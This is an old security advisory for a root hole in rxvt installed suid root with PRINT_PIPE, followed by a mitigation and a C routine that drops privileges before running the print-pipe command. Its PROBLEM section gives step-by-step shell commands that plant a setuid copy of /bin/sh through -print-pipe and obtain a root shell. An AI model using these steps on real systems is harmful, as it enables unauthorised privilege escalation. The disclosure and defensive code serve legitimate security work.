COMMAND

    rxvt

AFFECTED SYSTEMS

    Linux Slackware 3.0, RedHat 2.1
    others with rxvt suid root (and compiled with PRINT_PIPE)

PROBLEM

    There is a major security hole in rxvt, a terminal emulator for X,
    when it is installed suid root, as many configurations require so
    that it can write to the utmp file.  It is obvious from the code
    that this program was not written to be run suid root; it's a pity
    that sysadmins who install the compiled versions of this sort of
    code don't see the same 'run suid root at your own risk' warnings
    that the people who put together a distribution with it set up
    that way see in the makefile.

    The conditions that allow this particular hole to be exploited are
    rxvt compiled with the PRINT_PIPE option and running suid root.
    The program sets the pipe command to "lpr" without a pathname, but
    it is even easier than that to exploit, because the pipe command
    can be set to anything at all with the -print-pipe option on the
    rxvt command line.  Although the program gives up its root
    privileges when forking to run a shell or other command, the main
    program itself continues running suid root for its entire
    execution.

    Because the popen() call runs as root, whatever program the pipe
    opens executes immediately as root.  The printer pipe is started
    with the vt100 printer-on sequence, ESC[5i, and closed with the
    printer-off sequence, ESC[4i.  Exploiting this is extremely easy.

    1.  Set the DISPLAY environment variable if necessary so you can
        use X clients.

    2.  In user shell:

	$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
	$ chmod +x /tmp/rxbug
	$ rxvt -print-pipe /tmp/rxbug

    3.  In rxvt xclient:

	$ cat
	  ESC[5i
	  ESC[4i

	(The client will close at this point with a broken pipe)

    4.  $ /tmp/rxsh
	# whoami
	root
	#

SOLUTION

    chmod -s /usr/X11R6/bin/rxvt
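
    Stripping the suid bit removes the exposure; the code-level fix is
    for the pipe command never to inherit root in the first place.
    The following is an added example, not rxvt's own code, of a
    popen(cmd, "w") replacement in which the child process drops to the
    real uid and gid and checks that the drop took effect before
    exec'ing the print-pipe command.  The names print_pipe_open,
    print_pipe_close and run_print_pipe are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Hypothetical replacement for popen(cmd, "w") in a setuid-root
 * program: the child drops to the real uid/gid and verifies the drop
 * before exec'ing the (user-supplied) pipe command. */
static FILE *print_pipe_open(const char *cmd, pid_t *pid_out)
{
    int fds[2];
    if (pipe(fds) < 0) return NULL;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return NULL; }
    if (pid == 0) {                    /* child: becomes the pipe command */
        close(fds[1]);
        if (dup2(fds[0], STDIN_FILENO) < 0) _exit(127);
        close(fds[0]);
        /* Drop the group first, then the user; any failure aborts. */
        if (setgid(getgid()) < 0 || setuid(getuid()) < 0) _exit(126);
        if (geteuid() != getuid() || getegid() != getgid()) _exit(126);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);
    }
    close(fds[0]);                     /* parent keeps the write end */
    *pid_out = pid;
    return fdopen(fds[1], "w");
}

/* Close the pipe and return the command's exit status, or -1. */
static int print_pipe_close(FILE *fp, pid_t pid)
{
    int status;
    fclose(fp);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Feed text to cmd through the pipe and report how cmd exited. */
int run_print_pipe(const char *cmd, const char *text)
{
    pid_t pid;
    FILE *fp = print_pipe_open(cmd, &pid);
    if (fp == NULL) return -1;
    fputs(text, fp);
    return print_pipe_close(fp, pid);
}
```

    The effective identity is checked after the drop because on some
    systems a failed setuid() leaves the saved root uid recoverable.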